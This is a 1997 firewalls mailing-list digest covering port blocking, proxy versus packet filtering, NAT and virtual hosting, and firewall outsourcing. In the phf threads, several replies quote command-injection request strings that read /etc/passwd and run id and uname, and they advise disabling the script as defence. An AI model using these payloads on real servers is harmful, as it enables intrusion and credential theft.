<97Jun5.080502cdt.36891-2@igate.panenergy.com> X-Sender: rlaird@igate.panenergy.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Thu, 5 Jun 1997 08:06:32 -0500 To: firewalls@GreatCircle.COM From: Robert Laird Subject: client can't reach port 82 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk First, I'm not a firewall expert (which I why I read this list!), and only know some basics. Someone came to me and asked why they couldn't reach a Lotus Corp Web site from within their company's firewall, but could easily get to it from their home PC via ISP. I looked at the site and it's using port 82. My guess was that their firewall was set up to block any incoming data from non-standard (port 80) ports. Is this right? -- Robert --------------------------------------- Robert Laird *** Houston, Texas Quadrant Computer Systems mailto:rlaird@concentric.net mailto:70070.460@compuserve.com mailto:rlaird@panenergy.com Home Page: http://www.concentric.net/~rlaird/ Day phone: 713-260-6586 --------------------------------------------- From owner-firewalls-outgoing Thu Jun 5 09:46:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA23029 for firewalls-outgoing; Thu, 5 Jun 1997 07:44:19 -0700 (PDT) Received: from point.sybronint.com ([208.19.132.70]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA23011 for ; Thu, 5 Jun 1997 07:44:11 -0700 (PDT) Received: from xxxaaa ([208.19.132.152]) by point.sybronint.com (8.8.5/8.8.5) with SMTP id SAA12342 for ; Fri, 13 Jun 1997 18:51:47 -0500 Received: by xxxaaa with Microsoft Mail id <01BC7195.8A687AA0@xxxaaa>; Thu, 5 Jun 1997 09:47:54 -0500 Message-ID: <01BC7195.8A687AA0@xxxaaa> From: Matt Eide To: "'firewalls@GreatCircle.COM'" Subject: RE: PIX and Firewall-1 Date: Thu, 5 Jun 1997 09:47:47 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Application proxies monitor commands sent at the application layer, and reconstruct packets so that IP attacks can't be sent beyond the = firewall. (From what I understand), State-based (a.k.a. enhanced extended packet filter) security devices inspect the first packet that comes across with enhanced extended filtering rules and can include additional = authentication. If that packet passes all filtering rules, remaining packets of that = session are passed through without inspection. I would like to add that Firewall-1 can be set to continue monitoring = all the packets of an established session and will check them against = the rule base.=20 Later, Matt Meide@sybronint.com From owner-firewalls-outgoing Thu Jun 5 10:02:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA21892 for firewalls-outgoing; Thu, 5 Jun 1997 07:26:26 -0700 (PDT) Received: from snoopy.hypercon.com (mail2.concom.com [198.64.246.149]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA21885 for ; Thu, 5 Jun 1997 07:26:19 -0700 (PDT) Received: from pitbull.ep.hess.com ([207.51.255.129]) by snoopy.hypercon.com (post.office MTA v1.9.1 ID# 0-11151) with SMTP id AAA61; Thu, 5 Jun 1997 09:33:09 -0500 Received: from hac31d.ep.hess.com ([15.43.4.161]) by pitbull.ep.hess.com via smtpd (for mail2.concom.com [198.64.246.149]) with SMTP; 5 Jun 1997 14:30:08 UT Message-ID: <3396CD7E.71C4@hypercon.com> Date: Thu, 05 Jun 1997 09:30:22 -0500 From: msquared Reply-To: msquared@hypercon.com X-Mailer: Mozilla 3.0 (Win95; U) MIME-Version: 1.0 To: jlowder@mustang.usafa.af.mil CC: firewalls@greatcircle.com Subject: RAPTOR WEBNOT Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Jun 97 6:09:32 GMT, msquared@hypercon.com wrote: >Lt. have you tried contacting Microsystems directly - >http://www.microsys.com? I suspect you will get a more immediate >response to your problem if you do. Thanks, Mike. That's exactly what I've been doing. BTW, I sent that e-mail to the Raptor list several months ago... Any idea why I'm getting responses all of a sudden? No explanation for the recent Raptor interest. I did notice Alan Rogers from Raptor is involved. When I worked with Raptor, he seemed to be someone who could get things done. I suspect all the recent mail on this list is part of the reason. If I were a vendor I would be concerned if the public was getting the perception my product didn't function properly. I suggest we take this offline from this point since this really isn't a firewall related security issue and probably not of interest to most of the list. Mike From owner-firewalls-outgoing Thu Jun 5 10:30:45 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA16374 for firewalls-outgoing; Thu, 5 Jun 1997 05:47:10 -0700 (PDT) Received: from paranoid.convey.ru (ws04.convey.ru [195.182.128.19]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA16351 for ; Thu, 5 Jun 1997 05:46:58 -0700 (PDT) Received: (from ark@localhost) by paranoid.convey.ru (8.7.5/8.7.3) id QAA02637; Thu, 5 Jun 1997 16:50:41 +0400 From: ArkanoiD Message-Id: <199706051250.QAA02637@paranoid.convey.ru> Subject: Re: Plug-gw- One to many relationship To: hagan@cih.com Date: Thu, 5 Jun 1997 16:50:41 +0400 (MSD) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "Craig I. Hagan" at Jun 4, 97 01:36:29 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk nuqneH, > > You want both clients to be able to plug to either server. To accomplish > > this, assign two addresses to the firewall on the client side and two > > addresses to the firewall on the server side so that you have: > > heck, why not make it a transparent proxy? i've done that already > (ftp.cih.com:~hagan/pub/fix-kits/fwtk/trans.diff.gz [*], NB: old patches). > the > advantage there is that you don't have to have 8 batrillion entries, > permit what you want and let plug-gw figure out the destination host from > 'its' ip address as is given by the OS. I'll admit that i've only done > this with linux, but, as many have said, solaris and other OSes should > work, too. Hmm haven't try that ones but ipfilter distribution (BSD systems) includes similar ones for ipfilter package.. -- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! From owner-firewalls-outgoing Thu Jun 5 10:39:38 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA14810 for firewalls-outgoing; Thu, 5 Jun 1997 05:19:52 -0700 (PDT) Received: from datacommcorp.com ([206.152.253.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA14781 for ; Thu, 5 Jun 1997 05:19:36 -0700 (PDT) Message-Id: <199706051219.FAA14781@honor.greatcircle.com> Received: from [199.34.57.89] by datacommcorp.com (SMTPD32-95.10.15) id A093C1300DA; Thu Jun 05 08:26:59 1997 From: "Steve Rudolph" To: "David Harvey-George" , Subject: Re: FW-1 and IP Forwarding on NT Box Date: Thu, 5 Jun 1997 08:26:39 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1161 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk David and group.... I have already got this running. Thank you to all who responed to my inquiry. I have learned alot just from the replys. I left my brain in the shower that day..... I forgot to set the Default Gateway on EACH machine on both networks to the NIC in the router on that machines network. Now I just need to krak the router password for a Cisco AccessPro 2500 PC card. This piece of equipment came in a firewall disguise call MCI Webmaker. This was a combination Port filter router and proxy server. As it turns out Intel programed the software (proxy), and configured the router. Vanstar installed the os (NT), and none of the above are able to get me the router password. Right now my DNS is being partially blocked because of this (I know very little about DNS, any good books? I am using MS DNS-OK for now (:o) ). I contacted Cisco and the only way to break the password is to send a break to the com port (remember it is a pc card) in terminal mode within 60 seconds. And then begin the recovery sequence. Kind of hard to do with NT or 95. I can't seem to find a copy of Dos 5.0 or an old hard drive anywhere with a dos based terminal program. Ths whole situation is messed. My employer wants to wait to use the router and not buy a new one. It is holding up US$40K in billing though. Can anyone help, or if you have a similar problem let me know and I will get you the correct person to call. Thanks again Steve Rudoph http://www.datacommcorp.com srudolph@datacommcorp.com http://www.rude-dog.com http://www.rust.net/~stever stever@rust.net ---------- > From: David Harvey-George > To: Steve Rudolph ; firewalls@greatcircle.com > Subject: Re: FW-1 and IP Forwarding on NT Box > Date: Wednesday, June 04, 1997 7:14 PM > > > > I followed all of microsoft's reccomendations. > > Possibly a bad move. > > > Two nic cards a and b > > Sounds like the start of a stand-up comedy routine > > > > > A is set with default gateway of b > > and b is set with gateway of a > > it is! > > Okay, look, the system with the two cards knows how to route to each > network. All you've gotta do is set up the default gateway for > workstations on network A (NIC A) and the default gateway for workstations > on network B (NIC B). Don't touch anything on the router if your network > really is this simple (e.g. no other routes). If you have other routes > then use the route command directly. > > > Workstations can ping a and b > > Workstations cannot ping network b > > Ip forwarding is enabled and my route print matches exactly the format of > > microsofts reccomendations. > > > > I really need to get this up and running. I would get you the route > print, > > but I cannot get the addresses to copy onto the clip board..duh :) > > Yeah, I think you better send us the output from netstat on both the > 'router' and the workstations. > > Run netstat -rn from a DoZ window, click on the little Doz icon at the left > of the title bar, select edit/mark, mark the stuff you want to send, copy > it and paste it. > > David From owner-firewalls-outgoing Thu Jun 5 10:54:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA22520 for firewalls-outgoing; Thu, 5 Jun 1997 07:37:30 -0700 (PDT) Received: from cerberus2.fon.sprintcorp.com (cerberus2.fon.sprintcorp.com [204.215.0.61]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA22376 for ; Thu, 5 Jun 1997 07:35:06 -0700 (PDT) From: BLeBlanc@igate.sprint.com Received: by cerberus2.fon.sprintcorp.com; id JAA04475; Thu, 5 Jun 1997 09:38:49 -0500 (CDT) Received: from fonkc28.fon.sprintcorp.com(144.223.19.54) by cerberus2.fon.sprintcorp.com via smap (3.2) id xma004469; Thu, 5 Jun 97 09:38:47 -0500 Received: FROM FONIMAIL.fonkc28.fon.sprintcorp.com BY fonkc28.fon.sprintcorp.com ; 5 JUN 97 09:39:10 CDT Date: 5 JUN 97 09:36:55 CDT Subject: RE: ISP Connection To: firewalls@greatcircle.com Message-ID: <0007wwcaiamc.H000012201eadb69@igate.sprint.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Having a third party perform the administrative functions must be determined by weighing many factors. You need to decide: "Which security technology is best for my environment? (based on your security policy - what type(s) of security need to be deployed? Firewall? Strong Authentication? Encryption? and what/who are you trying to secure?) "Who are the respected and reliable vendors in the market?" (this must include the third party that you are considering doing the management, as well as, the vendor/manufacturer of the security products themselves). Obviously, monetary cost factors come in to play. Whether you buy the hardware/os/software and manage the components in-house -vs- you out-source these to a third party and pay month-to-month. Do you have the staff to manage the firewall in-house? (A firewall is NOT a collateral duty to be assigned to a data center's staff that has no background in firewalls). What level of expertise does the third-party have? (Your third-party vendor should have a significantly sized team of security engineers that have substantial background and knowledge in the security areas you need/choose). What standard services does the third party perform? You (the customer) must have the ability to sit with the third party and "design a unique-to-you" security service. YOU must be able to determine the rules. You must have the power to change those rules at any time (24*7*365). What value-added services does the third party perform? Do they perform monitoring for suspicious activity? Do they perform backups on all of the critical files and maintain them off-site (this should be part of your disaster recovery plan for all systems)? Do they provide you with a detailed report of what happened on the firewall? Once you have weighed these issues (these being a sample of the total questions you need to ask yourself and the third-party provider), you should be able to make a determination on whether to handle the task in-house or out-source. Hope this helps, Bob >---------- >From: Mariko Yashada[SMTP:mariko@grfn.org] >Sent: Wednesday, June 04, 1997 3:01 PM >To: Firewalls Mailing List >Subject: Re: ISP Connection > > > >Thank you for all your comments. Last fall our plan was to connect to the >Internet through MCI. We security people said fine, but you will need a >firewall for any connections between the Internet and the Enterprise >Network. So we did an evaluation of firewalls and settled on two we felt >best suited our needs. The firewall added enough cost to the project that >it was postponed. It has now been revived using our ISP for the connection >with the hope the ISP can some way offer the security. I see now we should >to follow our original plan and put up a firewall at our end. > > >Here is a related question: > >There is another local ISP who will connect us at T1 and install a firewall >at our location. They will then administer the firewall remotely from their >location. They support three different firewalls, Gauntlet, Firewall-1 and >Borderware. The advantage is the savings in admin costs. Has anyone had any >experience with this type of arrangement? We have also talked to BBN about >their Site Patrol product, which is a remotely managed Gauntlet. > >Thanks, > >Mariko > From owner-firewalls-outgoing Thu Jun 5 11:33:21 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA16373 for firewalls-outgoing; Thu, 5 Jun 1997 05:47:10 -0700 (PDT) Received: from psyche.the-wire.com (psyche.the-wire.com [198.53.192.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA16349 for ; Thu, 5 Jun 1997 05:46:55 -0700 (PDT) Received: from anton.the-wire.com (anton.the-wire.com [205.206.32.227]) by psyche.the-wire.com (8.8.5/8.6.12) with SMTP id IAA16830; Thu, 5 Jun 1997 08:45:40 -0400 (EDT) Message-Id: <3.0.32.19970605082442.0094c5f0@the-wire.com> X-Sender: anton@the-wire.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Thu, 05 Jun 1997 08:47:10 -0400 To: Bernd Eckenfels From: Anton J Aylward Subject: Re: Plug-gw- One to many relationship Cc: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 01:07 AM 05/06/97 +0200, you wrote: ## Reply Start ## >Hi, > >> No, no, no, what *I* want and what about 10^7 other sites want is this... >> >> client A W server C >> firewall server D >> client B server F >> server G >> server H >> server I >> server K > >there are 2 Solutions (if we are talking about WWW) Yes, we are. >a) use different Ports > W:80 -> C:80 > W:8080 -> D:80 > W:8081 -> E:80 Thank you, granted, but not the question I was posing. This is a specific answer not a general one. >b) use the Host Command from HTTP which no browser nor Server does Support > yet :) Good thing you put the smiley in. >To get back on it, its not a problem of software, but of design. There is no >way a Server can tell what the host part of an URL was other than looking at >the connected address:port Combination. If you have only one valid address >you can run only one server at a given port. Now we're getting dow to it. Most of the people who have responded to me have missed out on a very important fact. You can't regenerate lost information. If we have a publicly available DNS - somewhere out on the 'net - has that single IP address ("W" in my diagram above) for all of www.company001.com for server "C" www.company002.com for server "D" www.company003.com for server "E" ... www.company253.com ...... www.company254.com ...... The fw sees an incoming packet from a remote client which has SrcAddr: DstAddr: the single address supplied by DNS Port: 80 then the DNS mapping has LOST information. To tell whether to map a connection to "W:80" to server "C" or to server "D" requires regenerating this information. Now the answer (B) above takes the view that the message body contains this information. Problem solved, there is a means of regenerating the information. Only it isn't there. If this problem were trivially solvable, then we wouldn't be doing IP masquerading on web servers. We would have a single (physical) server with a single (software) instance of the server runing for all of www.company001.com www.company002.com www.company003.com ... www.company253.com www.company254.com We don't do this, we are eating up IP addresses for each and every server quite independently of the NAT situation. I believe this is a problem in information content. The HOST command, as Bernd says, is not implemented widely enough to make it practical. The people who talk about kernel hack support for a plug-gw solution have not made it clear how the lost information is to be regenerated. I'd like to shift the focus of this discussion away from talking about hacking plug-gw and to the real question one of Information Theory. I say again, the many-to-one mapping of DNS is information lossy. How are you going to generate that information so that whatever your code hack is can performed the correct one-to-many mapping at the firewall. Like Alice talking to the Cat: You have to know where you're going. ## Reply End ## -------------------------------------------------------------------------- Anton J Aylward | Security is not something that comes in The Strahn & Strachan Group Inc | a self-contained box. It is an attribute Information Security Consultants | of how you do business and as such Voice: (416) 494-8661 | needs to be managed carefully. Fax: (416) 494-8803 | - Karen Goertzel, Wang Federal Inc. From owner-firewalls-outgoing Thu Jun 5 11:42:52 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA13925 for firewalls-outgoing; Thu, 5 Jun 1997 10:04:47 -0700 (PDT) Received: from challenger.atc.fhda.edu (challenger.atc.fhda.edu [153.18.200.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA13891 for ; Thu, 5 Jun 1997 10:04:30 -0700 (PDT) Received: from localhost (manek@localhost) by challenger.atc.fhda.edu (8.8.0/8.7.3) with SMTP id KAA10423; Thu, 5 Jun 1997 10:08:27 -0700 (PDT) Date: Thu, 5 Jun 1997 10:08:26 -0700 (PDT) From: "Sameer R. Manek" To: Stan Wnuck cc: firewalls@GreatCircle.COM Subject: Re: psswd HACK In-Reply-To: <199706051407.HAA20909@honor.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is how the exploit is done http://"name of server"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd But that's not really important. Lets assume they got your passwd file. That means they have the option to crack on that passwd file, lets assume they did that too. They know in theory know the login and password of every one on that machine. I'll bet the login names and password of people on your webserver are the same as their login/password as other machines on your network. Does this cause concern? it should. Given the fact that they ran the phf script in april, they've had atleast a month to run crack. Assume that your webserver has been compromised and they have had a sniffer running on that box for a month, what would you do? You need to think about the worstcase senerio and work backwards instead of thinking 'oh all they got was my password file' -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Sameer Manek manek@challenger.atc.fhda.edu The last four line .signature file on the entire internet -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From owner-firewalls-outgoing Thu Jun 5 12:02:33 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA24820 for firewalls-outgoing; Thu, 5 Jun 1997 08:03:32 -0700 (PDT) Received: from diderot.sibernet.com.tr (sb-router.sibernet.com.tr [195.142.229.88]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA24592 for ; Thu, 5 Jun 1997 08:01:10 -0700 (PDT) Received: from localhost (root@localhost) by diderot.sibernet.com.tr (8.8.5/8.6.9) with SMTP id SAA04125; Thu, 5 Jun 1997 18:05:24 +0300 Date: Thu, 5 Jun 1997 18:05:24 +0300 (EET DST) From: Root Admin-KSoft X-Sender: root@diderot To: Stan Wnuck cc: Firewalls@GreatCircle.COM Subject: Re: getting passwd file via WWW In-Reply-To: <199706041601.JAA03033@honor.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Jun 1997, Stan Wnuck wrote: > Hi all, > > I have noticed on my WWW log files the following 2 entries. > > some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140 Since result code is 200 (success) it seems that you have phf pls disable it asap. Go to cgi-bin directory and do a chmod 0 phf... Pls. refer to my previosu mail also. Best Regards Kerem ERSOY > some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143 > > > Does anyone know anything about these cgi scripts or programs? > Or how dangerous this is? > > > I changed the real source location to a fake some.remote.location.edu to > not let out the bag of the source of this hack, since I am not sure what > my next move would be. OK but your e-mail address is probably giving your some.tremote.site isn't it :) > > > Thanks in advance. > > > > Stan Wnuck swnuck@unixpros.com > Unixpros, Inc. > 10 Industrial Way East (908) 389-3295 x542 > Eatontown, NJ 07724 (908) 389-5461 Fax > > PM-CHS Technology Insertion Office > Ft. Monmouth Army Base, NJ (908) 427-2033 / 427-6963 > +---------------------------------------------------- sibernet internet security experts and sokak 8/1 cankaya ankara turkiye 06680 tel : +90-312-4670198 (pbx) fax: +90-312-4670199 http://www.sibernet.com.tr/ mail: info@sibernet.com.tr From owner-firewalls-outgoing Thu Jun 5 12:20:02 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA18788 for firewalls-outgoing; Thu, 5 Jun 1997 10:30:19 -0700 (PDT) Received: from newfed.frb.gov (newfed.frb.gov [198.3.221.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA18730 for ; Thu, 5 Jun 1997 10:30:04 -0700 (PDT) Received: from FRB.GOV (umailfwd@localhost) by newfed.frb.gov (8.8.5/8.8.5) with UUCP id NAA23124; Thu, 5 Jun 1997 13:13:10 -0400 (EDT) Received: from kryten.frb.gov by frbgate.FRB.GOV (4.1/SMI-4.0) id AA16199; Thu, 5 Jun 97 13:18:51 EDT Received: from localhost.frb.gov (localhost.frb.gov [127.0.0.1]) by kryten.frb.gov (8.8.5/8.8.5) with SMTP id NAA08468; Thu, 5 Jun 1997 13:18:51 -0400 (EDT) Message-Id: <199706051718.NAA08468@kryten.frb.gov> X-Authentication-Warning: kryten.frb.gov: localhost.frb.gov [127.0.0.1] didn't use HELO protocol X-Mailer: exmh version 1.6.5 12/11/95 To: Cy Ardoin Cc: Firewalls@GreatCircle.COM Subject: Re: PIX and FW-1 (packet filter Question) In-Reply-To: Your message of "Wed, 04 Jun 1997 19:45:07 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 05 Jun 1997 13:18:49 -0400 From: "Jonathan M. Bresler" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I don't think there is anything an application firewall can >do that can't also be done by a "packet filter" firewall. The trivial example: a smtp application level proxy can disable the "debug" command for every sendmail behind that firewall. >new packet filter firewalls are not like the old Cisco/Bay router >filters. The new systems operate at the network layer, but they >have knowledge of the protocols and applications. They >open up the packets and modify the data. These systems are >doing content filtering and other "application" types of operations. >Yes, not all of them do these things, but many do, and new >feature/functions are being added to these systems every year. jmb -- Jonathan M. Bresler 202-452-2831 breslerj@frb.gov MS-169 Federal Reserve Board of Governors Washington DC 20551 Speaking for myself. Others speak for the Federal Reserve Board of Governors From owner-firewalls-outgoing Thu Jun 5 13:04:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA13650 for firewalls-outgoing; Thu, 5 Jun 1997 10:02:42 -0700 (PDT) Received: from tlingit.elmail.co.uk (tlingit.elmail.co.uk [193.122.233.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA13612 for ; Thu, 5 Jun 1997 10:02:22 -0700 (PDT) Received: from mojave.elmail.co.uk (mojave.elmail.co.uk [193.112.20.14]) by tlingit.elmail.co.uk with SMTP id SAA13564 (2.1.1h-8.8.5/2.1); Thu, 5 Jun 1997 18:08:50 +0100 (BST) Date: Thu, 5 Jun 1997 18:00:14 +0100 (BST) From: Daniel Strawson To: Craig Brozefsky cc: Jyri Kaljundi , Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk OK, public apology time - I've taken a look at this again. The urgent point is not an IP option (as I had understood), but a TCP option. Hence, the 'IP Options' stuff in FW-1 hence doesn't apply and the packets will get through. For the record, however, FW-1 does drop all packets with IP header options as none of these should be used nowadays (manual page 295). Sorry for adding confusion. Cheers, Daniel On Thu, 5 Jun 1997, Craig Brozefsky wrote: > On Thu, 5 Jun 1997, Daniel Strawson wrote: > > > Hang on a moment. > > > > Let me put this in perspective. > > > > As I understand it, this problem results from sending packets with a > > particular IP option set in the header. (Please confirm I'm right here > > someone). > > > > Firewall _SHOULD_ drop all packets with IP options set. This would mean > > that all Firewall-1 systems and systems behind Firewall-1 are impervious > > to this attack. (something for Checkpoint to be proud of). > > Uhm, I don't have any RFCs or source code in front of me right now, but > my understanding was that several options would need to get thru, OOB > being one of them, as some applications make use of it, telnet for > instance if I'm not mistake (tho I may be and invite correction). > > > Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to > > crash, you get the NT system that it is running on to crash, so it is not > > an insecurity, but a claimed feature that doesn't work. > > Not how I would interpret it. I would consider this the responsibility > of he FW vendor. They are responsible for the TCP/IP stack IMO. If they > aren't replacing it, then they are assumign the OS vendor is competent, > not something I would agree with. > > Craig Brozefsky craig@onshore.com > onShore Inc. http://www.onshore.com/~craig > Development Team p_priority=PFUN+(p_work/4)+(2*p_cash) > > From owner-firewalls-outgoing Thu Jun 5 13:04:27 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA01504 for firewalls-outgoing; Thu, 5 Jun 1997 08:52:04 -0700 (PDT) Received: from zippy.radian.com (zippy.radian.com [129.160.16.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA01422 for ; Thu, 5 Jun 1997 08:51:40 -0700 (PDT) Received: from ccsmtpgate.radian.com (ccsmtpgate.radian.com [129.160.224.126]) by zippy.radian.com (8.8.5/8.8.5) with SMTP id KAA16712 for ; Thu, 5 Jun 1997 10:53:55 -0500 (CDT) Received: from ccMail by ccsmtpgate.radian.com (IMA Internet Exchange 2.1 Enterprise) id 000D79B8; Thu, 5 Jun 97 10:54:46 -0500 Mime-Version: 1.0 Date: Thu, 5 Jun 1997 10:51:53 -0500 Message-ID: <000D79B8.3356@radian.com> From: Mark_Flanagan@radian.com (Mark Flanagan) Subject: Microsoft NetMeeting To: firewalls@greatcircle.com Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone have or can you point me to a site with the particulars on Microsoft NetMeeting. I'm looking for the protocol, ports, security risks, etc. Thanks in advance. Mark Flanagan mark_flanagan@radian.com From owner-firewalls-outgoing Thu Jun 5 13:17:45 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA23912 for firewalls-outgoing; Thu, 5 Jun 1997 07:53:29 -0700 (PDT) Received: from diderot.sibernet.com.tr (sb-router.sibernet.com.tr [195.142.229.88]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA23816 for ; Thu, 5 Jun 1997 07:52:23 -0700 (PDT) Received: from localhost (root@localhost) by diderot.sibernet.com.tr (8.8.5/8.6.9) with SMTP id RAA04099; Thu, 5 Jun 1997 17:56:27 +0300 Date: Thu, 5 Jun 1997 17:56:26 +0300 (EET DST) From: Root Admin-KSoft X-Sender: root@diderot To: Arnaud Girsch cc: Stan Wnuck , Firewalls@GreatCircle.COM Subject: Re: getting passwd file via WWW In-Reply-To: <199706042108.OAA27744@mail.marben.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Jun 1997, Arnaud Girsch wrote: > > > I have noticed on my WWW log files the following 2 entries. > > > > some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140 > > some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143 Once All the httpd daemons come bundled with a script called phf this script initially designed to build a mechanism like finger + whois But there's a bug in this phf script that when it is used as above could print any file (in this case /etc/passwd!!!!) or run any command in root priviliege. I mean somebody tried to hack you passwd file. The best thing to do is to go to your cgi-bin directory and issue a "chmod 0 phf" and if you think you still need it pick a patched one . I Can not remember where. Bu it measns that definitely somebody tried to hack your system.... > > > > > > Does anyone know anything about these cgi scripts or programs? > > Or how dangerous this is? > > These are well known cgi scripts containing security holes. > The phf script coming with the default NCSA server is buggy, and should be > disabled. (it allowas execution of shell programs) > > Arnaud. > > -- > Arnaud Girsch -+- Marben Products, Inc. / DSET Corporation - San Jose, CA > agirsch@marben.com -+- http://www.marben.com/ -+- http://www.dset.com/ > +---------------------------------------------------- sibernet internet security experts and sokak 8/1 cankaya ankara turkiye 06680 tel : +90-312-4670198 (pbx) fax: +90-312-4670199 http://www.sibernet.com.tr/ mail: info@sibernet.com.tr From owner-firewalls-outgoing Thu Jun 5 15:08:36 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA13487 for firewalls-outgoing; Thu, 5 Jun 1997 10:01:38 -0700 (PDT) Received: from gate.adtranz-signal.co.uk (gate.adtranz-signal.co.uk [171.29.54.135]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id KAA13383 for ; Thu, 5 Jun 1997 10:01:14 -0700 (PDT) Received: from mail-server.ply.adtranz-signal.co.uk (mail-server.ply.adtranz-signal.co.uk [171.30.30.102]) by gate.adtranz-signal.co.uk (8.6.12/8.6.12) with SMTP id SAA10998; Thu, 5 Jun 1997 18:09:02 +0100 Received: from [171.30.30.104] by mail-server.ply.adtranz-signal.co.uk (SMTPD32-3.04) id AFBD48B0084; Thu, 05 Jun 1997 18:04:45 +0000 Received: by PAVPC.ply.adtranz-signal.co.uk with Microsoft Mail id <01BC71DA.F3A690C0@PAVPC.ply.adtranz-signal.co.uk>; Thu, 5 Jun 1997 18:04:46 -0000 Message-ID: <01BC71DA.F3A690C0@PAVPC.ply.adtranz-signal.co.uk> From: Pete Vickers To: Jyri Kaljundi , "'Bryan D. Boyle'" Cc: "firewalls@GreatCircle.COM" Subject: RE: 